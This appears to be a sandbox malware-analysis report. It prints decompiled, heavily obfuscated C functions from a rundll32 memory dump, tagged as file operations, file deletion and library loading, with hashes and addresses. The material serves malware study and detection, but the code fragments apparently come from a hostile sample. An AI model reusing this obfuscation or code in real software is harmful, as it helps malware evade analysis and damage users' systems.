Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: I/5o$aD[a$6$L
API String ID: 0-1330720659
Opcode ID: 5b8744ccb69fa7ea3bcc8d0dbd05df7d7625bca637d11319d50c0701754da0ab
Instruction ID: 32067881e8d5a94b1c8aefe0d621a3b22871e45472f7c3e7606c8ace6f6ee892
Opcode Fuzzy Hash: 5b8744ccb69fa7ea3bcc8d0dbd05df7d7625bca637d11319d50c0701754da0ab
Instruction Fuzzy Hash: D09142715183419FD368CF25D48941BFBF6BBC4358F10892DF196862A0D3B98A59CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00207B63, Relevance: 2.7, Strings: 2, Instructions: 187
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00207B63(void* __ecx, void* __edx, void* __eflags) {
				void* _t227;
				signed int _t253;
				signed int _t257;
				signed int _t258;
				void* _t279;
				void* _t280;

				_t279 = _t280 - 0x70;
				_push( *((intOrPtr*)(_t279 + 0x7c)));
				_push( *((intOrPtr*)(_t279 + 0x78)));
				_push(__edx);
				_push(__ecx);
				E0020602B(_t227);
				 *(_t279 + 0x5c) = 0x4f49;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff573d;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) >> 0xe;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff1f14;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) ^ 0x00031f13;
				 *(_t279 + 0x20) = 0x2d3b;
				 *(_t279 + 0x20) =  *(_t279 + 0x20) << 0xa;
				 *(_t279 + 0x20) =  *(_t279 + 0x20) ^ 0x00b4ea14;
				 *(_t279 + 0x38) = 0xada;
				_t257 = 0x56;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) * 0xd;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x7978ee92;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x79786b80;
				 *(_t279 + 0x44) = 0x9fd0;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) << 0xd;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) + 0xffff90c4;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) ^ 0x13f99f58;
				 *(_t279 + 0x28) = 0xbdd8;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) / _t257;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65272766;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65270fe8;
				 *(_t279 + 0x24) = 0xa469;
				 *(_t279 + 0x24) =  *(_t279 + 0x24) * 0x47;
				 *(_t279 + 0x24) =  *(_t279 + 0x24) ^ 0x002db229;
				 *(_t279 + 0x48) = 0xdd17;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) << 4;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) >> 9;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) ^ 0x00005398;
				 *(_t279 + 0x3c) = 0x840;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x7135c857;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) + 0xffffaa29;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x71355336;
				 *(_t279 + 0x34) = 0xe245;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x5c1086b0;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) << 0xc;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x064f42a5;
				 *(_t279 + 0x68) = 0x7c59;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 7;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) + 0xdfb1;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 1;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) ^ 0x00006add;
				 *(_t279 + 0x1c) = 0x17b0;
				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) * 0x33;
				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) ^ 0x0004ea7a;
				 *(_t279 + 0xc) = 0x52de;
				 *(_t279 + 0xc) =  *(_t279 + 0xc) >> 3;
				 *(_t279 + 0xc) =  *(_t279 + 0xc) ^ 0x00000565;
				 *(_t279 + 0x14) = 0xa04a;
				 *(_t279 + 0x14) =  *(_t279 + 0x14) + 0x5b3d;
				 *(_t279 + 0x14) =  *(_t279 + 0x14) ^ 0x0000ad98;
				 *(_t279 + 0x10) = 0x88b9;
				 *(_t279 + 0x10) =  *(_t279 + 0x10) << 0xa;
				 *(_t279 + 0x10) =  *(_t279 + 0x10) ^ 0x0222fd12;
				 *(_t279 + 0x58) = 0x8451;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) << 1;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff44cb;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff231f;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) ^ 0xffff3ae7;
				 *(_t279 + 0x2c) = 0xa221;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) << 0xe;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x37ec24ae;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x1f641a26;
				 *(_t279 + 0x6c) = 0xb834;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) * 5;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xff22;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xffff2c65;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) ^ 0x00038cf7;
				 *(_t279 + 0x60) = 0x6d71;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) + 0xffff2e20;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) << 0xa;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) >> 7;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) ^ 0x01fcf6fe;
				 *(_t279 + 0x40) = 0xcc9d;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) << 1;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) | 0xa720d145;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) ^ 0xa721d74b;
				 *(_t279 + 0x50) = 0xea3;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) + 0x27fa;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) >> 7;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) ^ 0x00000071;
				 *(_t279 + 0x64) = 0xe156;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) + 0x8b10;
				_t258 = 0x77;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) / _t258;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) << 7;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) ^ 0x0001fc91;
				 *(_t279 + 0x54) = 0xb949;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0xe8c9a038;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x53;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x46;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0x24032f8e;
				 *(_t279 + 0x4c) = 0x8c7e;
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) * 0x17;
				_t171 = _t279 - 0x14; // 0x68cf93e9
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) << 5;
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) ^ 0x0193ba3f;
				 *(_t279 + 0x30) = 0x8a4e;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) << 0xc;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) | 0xb22e72a5;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) ^ 0xbaaee90f;
				 *(_t279 + 0x18) = 0x537b;
				 *(_t279 + 0x18) =  *(_t279 + 0x18) >> 0x10;
				 *(_t279 + 0x18) =  *(_t279 + 0x18) ^ 0x00002127;
				E002193A8( *(_t279 + 0x44),  *(_t279 + 0x28),  *(_t279 + 0x24), _t171, 0x1e,  *(_t279 + 0x48));
				_t193 = _t279 - 0x21c; // 0x68cf91e1
				E002193A8( *(_t279 + 0x3c),  *(_t279 + 0x34),  *(_t279 + 0x68), _t193, 0x208,  *(_t279 + 0x1c));
				_t198 = _t279 - 0x424; // 0x68cf8fd9
				E002193A8( *(_t279 + 0xc),  *(_t279 + 0x14),  *(_t279 + 0x10), _t198, 0x208,  *(_t279 + 0x58));
				_t202 = _t279 - 0x21c; // 0x68cf91e1
				E00206636(_t202,  *(_t279 + 0x2c),  *(_t279 + 0x6c),  *(_t279 + 0x60),  *((intOrPtr*)(_t279 + 0x78)));
				_t208 = _t279 - 0x424; // 0x68cf8fd9
				E00206636(_t208,  *(_t279 + 0x40),  *(_t279 + 0x50),  *(_t279 + 0x64),  *((intOrPtr*)(_t279 + 0x7c)));
				 *(_t279 - 0x10) =  *(_t279 + 0x5c);
				_t214 = _t279 - 0x14; // 0x68cf93e9
				_t215 = _t279 - 0x21c; // 0x68cf91e1
				 *((intOrPtr*)(_t279 - 0xc)) = _t215;
				_t217 = _t279 - 0x424; // 0x68cf8fd9
				 *((intOrPtr*)(_t279 - 8)) = _t217;
				 *((short*)(_t279 - 4)) =  *(_t279 + 0x38) |  *(_t279 + 0x20);
				_t253 = E00217BF4(_t214,  *(_t279 + 0x54),  *(_t279 + 0x4c),  *(_t279 + 0x30),  *(_t279 + 0x18)); // executed
				asm("sbb eax, eax");
				return  ~_t253 + 1;
			}

0x00207b64
0x00207b6f
0x00207b72
0x00207b75
0x00207b76
0x00207b77
0x00207b7c
0x00207b85
0x00207b8c
0x00207b90
0x00207b97
0x00207b9e
0x00207ba5
0x00207ba9
0x00207bb0
0x00207bbd
0x00207bbe
0x00207bc1
0x00207bc8
0x00207bcf
0x00207bd6
0x00207bda
0x00207be1
0x00207be8
0x00207bf4
0x00207bf7
0x00207bfe
0x00207c05
0x00207c10
0x00207c13
0x00207c1a
0x00207c21
0x00207c25
0x00207c29
0x00207c30
0x00207c37
0x00207c3e
0x00207c45
0x00207c4c
0x00207c53
0x00207c5a
0x00207c5e
0x00207c65
0x00207c6c
0x00207c70
0x00207c77
0x00207c7a
0x00207c81
0x00207c8c
0x00207c8f
0x00207c96
0x00207c9d
0x00207ca1
0x00207ca8
0x00207caf
0x00207cb6
0x00207cbd
0x00207cc4
0x00207cc8
0x00207ccf
0x00207cd6
0x00207cd9
0x00207ce0
0x00207ce7
0x00207cee
0x00207cf5
0x00207cf9
0x00207d00
0x00207d07
0x00207d12
0x00207d15
0x00207d1c
0x00207d23
0x00207d2a
0x00207d33
0x00207d3a
0x00207d3e
0x00207d42
0x00207d49
0x00207d50
0x00207d53
0x00207d5a
0x00207d61
0x00207d68
0x00207d6f
0x00207d73
0x00207d77
0x00207d7e
0x00207d8a
0x00207d8d
0x00207d90
0x00207d94
0x00207d9b
0x00207da2
0x00207dad
0x00207db4
0x00207db7
0x00207dbe
0x00207dc9
0x00207dcc
0x00207dcf
0x00207dd3
0x00207dda
0x00207de1
0x00207de5
0x00207dec
0x00207df3
0x00207dfa
0x00207dfe
0x00207e14
0x00207e21
0x00207e32
0x00207e3a
0x00207e4b
0x00207e53
0x00207e65
0x00207e6d
0x00207e7c
0x00207e84
0x00207e87
0x00207e8a
0x00207e90
0x00207e93
0x00207e99
0x00207ea5
0x00207eb2
0x00207ebc
0x00207ec4

Strings

f''e, xrefs: 00207BF7
6S5q, xrefs: 00207C45

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID: 6S5q$f''e
API String ID: 3080627654-2864536462
Opcode ID: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
Instruction ID: 6ccdf3f18d165b5c1b901dd1fe14c9626256bac99b11d9c641f3c10177af87ac
Opcode Fuzzy Hash: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
Instruction Fuzzy Hash: D1A1CFB140134D9BEF59CF61C9898CE3BB1BF14358F508119FD2A962A0D3BAD999CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0020C0C6, Relevance: 1.4, Strings: 1, Instructions: 124
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0020C0C6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v592;
				void* _t141;
				void* _t159;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0020602B(_t141);
				_v64 = _v64 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v72 = 0x2e7eef;
				_v68 = 0x12a0e3;
				_v36 = 0x822d;
				_v36 = _v36 ^ 0x7542ca13;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00755fa2;
				_v48 = 0xc0ea;
				_t161 = 0x4d;
				_v48 = _v48 * 0x52;
				_v48 = _v48 + 0x53ba;
				_v48 = _v48 ^ 0x003e0539;
				_v8 = 0xf2be;
				_v8 = _v8 ^ 0xca92c6dd;
				_v8 = _v8 | 0xdeb53509;
				_v8 = _v8 + 0x330e;
				_v8 = _v8 ^ 0xdeb75724;
				_v28 = 0xbc60;
				_v28 = _v28 * 3;
				_v28 = _v28 ^ 0x088be546;
				_v28 = _v28 ^ 0x0889fb38;
				_v20 = 0x79be;
				_v20 = _v20 / _t161;
				_t162 = 0x2f;
				_v20 = _v20 * 0x21;
				_v20 = _v20 / _t162;
				_v20 = _v20 ^ 0x000058f8;
				_v12 = 0x6f12;
				_v12 = _v12 + 0x2ef8;
				_v12 = _v12 ^ 0xc4c69b2c;
				_t163 = 0x19;
				_v12 = _v12 / _t163;
				_v12 = _v12 ^ 0x07dec8f1;
				_v16 = 0x233d;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0xb86ca57e;
				_v16 = _v16 ^ 0x25a63868;
				_v16 = _v16 ^ 0x9dca839c;
				_v44 = 0x9c92;
				_v44 = _v44 ^ 0x484225af;
				_v44 = _v44 << 0xa;
				_v44 = _v44 ^ 0x0ae4f7f7;
				_v56 = 0xf3a1;
				_v56 = _v56 + 0xffff3be5;
				_v56 = _v56 ^ 0x00000dea;
				_v24 = 0xe687;
				_v24 = _v24 ^ 0x2fa59812;
				_v24 = _v24 | 0x8a70baf8;
				_v24 = _v24 << 0xe;
				_v24 = _v24 ^ 0x7fbf04b5;
				_v40 = 0x7d0b;
				_v40 = _v40 + 0xffffa14c;
				_v40 = _v40 + 0x5747;
				_v40 = _v40 ^ 0x000069af;
				_v32 = 0xbccf;
				_v32 = _v32 << 0xb;
				_v32 = _v32 + 0xa312;
				_v32 = _v32 ^ 0x05e7304f;
				_v52 = 0xd186;
				_v52 = _v52 << 7;
				_t164 = 0xc;
				_v52 = _v52 / _t164;
				_v52 = _v52 ^ 0x0008a17f;
				_push(_v48);
				E00217BAF(_v52,  &_v592, _v28, _a4, _v20, _v12, E0021889D(0x21c050, _v36, _v52));
				E00212025(_v16, _t154, _v44, _v56);
				_t159 = E0021AA3C(_v24, _v40, _v32, _v52,  &_v592); // executed
				return _t159;
			}

0x0020c0d0
0x0020c0d3
0x0020c0d6
0x0020c0d9
0x0020c0da
0x0020c0db
0x0020c0e0
0x0020c0e6
0x0020c0ea
0x0020c0f1
0x0020c0f8
0x0020c0ff
0x0020c106
0x0020c10a
0x0020c111
0x0020c11e
0x0020c121
0x0020c124
0x0020c12b
0x0020c132
0x0020c139
0x0020c140
0x0020c147
0x0020c14e
0x0020c155
0x0020c160
0x0020c163
0x0020c16a
0x0020c171
0x0020c17f
0x0020c186
0x0020c189
0x0020c193
0x0020c196
0x0020c19d
0x0020c1a4
0x0020c1ab
0x0020c1b5
0x0020c1b8
0x0020c1bb
0x0020c1c2
0x0020c1c9
0x0020c1cd
0x0020c1d4
0x0020c1db
0x0020c1e2
0x0020c1e9
0x0020c1f0
0x0020c1f4
0x0020c1fb
0x0020c202
0x0020c209
0x0020c210
0x0020c217
0x0020c21e
0x0020c225
0x0020c229
0x0020c230
0x0020c237
0x0020c23e
0x0020c245
0x0020c24c
0x0020c253
0x0020c257
0x0020c25e
0x0020c265
0x0020c26e
0x0020c277
0x0020c27f
0x0020c282
0x0020c289
0x0020c2ad
0x0020c2bd
0x0020c2d5
0x0020c2e1

Strings

~., xrefs: 0020C0EA

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: ~.
API String ID: 4033686569-2304494891
Opcode ID: 00cb59f4675927fb107a437f0e6c2759a116e45938280f2347bb156014271fb2
Instruction ID: a87f8006782ffd437bd0d2075c287f7d73db8684de9b7f1cbe6084294da447f1
Opcode Fuzzy Hash: 00cb59f4675927fb107a437f0e6c2759a116e45938280f2347bb156014271fb2
Instruction Fuzzy Hash: 16511371C1121DEBDF48DFE5D94A8EEBBB2FB48304F208159E511B62A0C7B91A58CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0020B41F, Relevance: 1.3, Strings: 1, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0020B41F(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _t91;
				signed int* _t93;
				intOrPtr _t95;
				signed int _t103;
				signed int _t104;

				_v44 = _v44 & 0x00000000;
				_v48 = 0x783c80;
				_v8 = 0x978d;
				_v8 = _v8 >> 8;
				_v8 = _v8 >> 5;
				_v8 = _v8 | 0x918d7e28;
				_v8 = _v8 ^ 0x918d7bef;
				_v28 = 0x8ae6;
				_v28 = _v28 + 0xffff2048;
				_v28 = _v28 ^ 0xfffff0f4;
				_v40 = 0x90b0;
				_v40 = _v40 + 0x186c;
				_v40 = _v40 ^ 0x0000e60c;
				_v12 = 0x4bc7;
				_t103 = __edx;
				_v12 = _v12 * 0x77;
				_v12 = _v12 >> 8;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x000165a0;
				_v36 = 0x87ea;
				_v36 = _v36 | 0x75974cd4;
				_v36 = _v36 ^ 0x75979443;
				_v32 = 0x7f4c;
				_v32 = _v32 ^ 0x8971dc13;
				_v32 = _v32 ^ 0x89718547;
				_v24 = 0xd36b;
				_t104 = 0x3c;
				_v24 = _v24 * 9;
				_v24 = _v24 << 1;
				_v24 = _v24 >> 5;
				_v24 = _v24 ^ 0x000045e9;
				_v20 = 0xf34d;
				_v20 = _v20 + 0x5309;
				_v20 = _v20 << 0xa;
				_v20 = _v20 | 0x23e3e3ea;
				_v20 = _v20 ^ 0x27fbee67;
				_v16 = 0xef72;
				_v16 = _v16 * 0x55;
				_v16 = _v16 << 0x10;
				_v16 = _v16 / _t104;
				_v16 = _v16 ^ 0x0225d37d;
				_push(_v28);
				_t91 = E00201000(_v40, _v12, _v36, _v32, E0021889D(_t93, _v8, _v16));
				_t95 =  *0x21ca28; // 0x482d00
				 *((intOrPtr*)(_t95 + 0x1c + _t103 * 4)) = _t91;
				return E00212025(_v24, _t90, _v20, _v16);
			}

0x0020b425
0x0020b429
0x0020b430
0x0020b437
0x0020b43b
0x0020b43f
0x0020b446
0x0020b44d
0x0020b454
0x0020b45b
0x0020b462
0x0020b469
0x0020b470
0x0020b477
0x0020b484
0x0020b48a
0x0020b48d
0x0020b491
0x0020b495
0x0020b49c
0x0020b4a3
0x0020b4aa
0x0020b4b1
0x0020b4b8
0x0020b4bf
0x0020b4c6
0x0020b4d1
0x0020b4d2
0x0020b4d5
0x0020b4d8
0x0020b4dc
0x0020b4e3
0x0020b4ea
0x0020b4f1
0x0020b4f5
0x0020b4fc
0x0020b503
0x0020b50e
0x0020b511
0x0020b51a
0x0020b51d
0x0020b524
0x0020b53e
0x0020b543
0x0020b551
0x0020b565

Strings

#, xrefs: 0020B4F5

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: #
API String ID: 1029625771-3128688783
Opcode ID: 5d4bd0bdbbdee04ea020b9bb670356f544e2453460308297b4113eb226e2692a
Instruction ID: 42710c2e7ee0eecbb990de642106ace15c3ffa251141297462e137bbc4eebedf
Opcode Fuzzy Hash: 5d4bd0bdbbdee04ea020b9bb670356f544e2453460308297b4113eb226e2692a
Instruction Fuzzy Hash: 9B41ED72C0021AEBDB04CFA5C94A4EEBBB1FB54318F208599D411B62A4D7B90B58CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0020568E, Relevance: .2, Instructions: 184
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E0020568E(void* __ecx, void* __edx) {
				void* _t188;
				void* _t209;
				void* _t210;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				intOrPtr _t242;
				void* _t245;
				void* _t248;
				void* _t249;

				_t248 = _t249 - 0x5c;
				_t242 =  *((intOrPtr*)(_t248 + 0x6c));
				_t245 = __edx;
				_push(0);
				_push( *((intOrPtr*)(_t248 + 0x78)));
				_push( *((intOrPtr*)(_t248 + 0x74)));
				_push( *((intOrPtr*)(_t248 + 0x70)));
				_push(_t242);
				_push( *((intOrPtr*)(_t248 + 0x68)));
				_push( *((intOrPtr*)(_t248 + 0x64)));
				_push(__edx);
				_push(__ecx);
				E0020602B(_t188);
				 *(_t248 + 0x38) = 0xda0c;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) << 7;
				_t215 = 0x75;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) * 0x59;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) ^ 0x25e734ff;
				 *(_t248 + 0x54) = 0xb39d;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) << 6;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) | 0xca3cae0f;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) * 0xe;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) ^ 0x0f551016;
				 *(_t248 + 0x1c) = 0x5da7;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x52b401ed;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) / _t215;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x00b496a1;
				 *(_t248 + 0x30) = 0xba31;
				_t216 = 0x2c;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) / _t216;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) | 0x346b3718;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) ^ 0x346b13e9;
				 *(_t248 + 0x2c) = 0x6402;
				_t217 = 0x3f;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) * 0x14;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) >> 2;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) ^ 0x0001cbcb;
				 *(_t248 + 0x34) = 0x3e45;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) << 0xb;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) >> 2;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) ^ 0x007ce60c;
				 *(_t248 + 0x3c) = 0xfd38;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) + 0xffffe888;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) * 0x69;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) ^ 0x005e4f03;
				 *(_t248 + 0x40) = 0xcc4c;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x07f5c2dc;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) / _t217;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x00207040;
				 *(_t248 + 0x28) = 0x6724;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) + 0xffffafc3;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) << 1;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) ^ 0x000008e0;
				 *(_t248 + 0x24) = 0x9d87;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) >> 6;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) * 0x24;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) ^ 0x00004341;
				 *(_t248 + 0x58) = 0xb89d;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) >> 0xb;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) + 0x8f1;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) << 8;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) ^ 0x00091f00;
				 *(_t248 + 0x44) = 0x534f;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) + 0x522f;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c12b7e9;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c125009;
				 *(_t248 + 0x20) = 0x7c36;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x32feb437;
				_t218 = 0x73;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) / _t218;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x0071b2de;
				 *(_t248 + 0x4c) = 0x6d80;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xd21e;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xffff4640;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x36936ae7;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x3693cc91;
				 *(_t248 + 0x50) = 0x11c0;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x65d8412a;
				_t219 = 0x49;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) / _t219;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x06211354;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) ^ 0x076544c6;
				 *(_t248 + 0x18) = 0x8ddc;
				 *(_t248 + 0x18) =  *(_t248 + 0x18) | 0x3e354716;
				 *(_t248 + 0x18) =  *(_t248 + 0x18) ^ 0x3e35d915;
				 *(_t248 + 0x14) = 0xfbdb;
				 *(_t248 + 0x14) =  *(_t248 + 0x14) * 0x44;
				 *(_t248 + 0x14) =  *(_t248 + 0x14) ^ 0x0042d7a4;
				 *(_t248 + 0x48) = 0xd404;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) >> 1;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0x728c;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0xfe7d;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) ^ 0x0001b0de;
				_t220 =  *(_t248 + 0x38);
				E002193A8( *(_t248 + 0x38),  *(_t248 + 0x54),  *(_t248 + 0x1c), _t248 - 0x40, 0x44,  *(_t248 + 0x30));
				 *((intOrPtr*)(_t248 - 0x40)) = 0x44;
				_t209 = E0021976F( *(_t248 + 0x2c), _t248 + 4,  *(_t248 + 0x34),  *(_t248 + 0x3c),  *(_t248 + 0x40),  *(_t248 + 0x28), _t248 - 0x40, _t245,  *(_t248 + 0x24),  *(_t248 + 0x38), _t220,  *(_t248 + 0x58),  *(_t248 + 0x44), _t220,  *(_t248 + 0x20),  *(_t248 + 0x4c),  *((intOrPtr*)(_t248 + 0x64)), _t220,  *((intOrPtr*)(_t248 + 0x74))); // executed
				if(_t209 == 0) {
					_t210 = 0;
				} else {
					if(_t242 == 0) {
						E00214F7D( *(_t248 + 0x50),  *(_t248 + 0x18),  *((intOrPtr*)(_t248 + 4)));
						E00214F7D( *(_t248 + 0x14),  *(_t248 + 0x48),  *((intOrPtr*)(_t248 + 8)));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t210 = 1;
				}
				return _t210;
			}

0x0020568f
0x0020569b
0x0020569e
0x002056a0
0x002056a2
0x002056a5
0x002056a8
0x002056ab
0x002056ac
0x002056af
0x002056b2
0x002056b3
0x002056b4
0x002056b9
0x002056c2
0x002056cc
0x002056cf
0x002056d2
0x002056d9
0x002056e0
0x002056e4
0x002056ef
0x002056f2
0x002056f9
0x00205700
0x0020570e
0x00205711
0x00205718
0x00205722
0x00205727
0x0020572c
0x00205733
0x0020573a
0x00205745
0x00205746
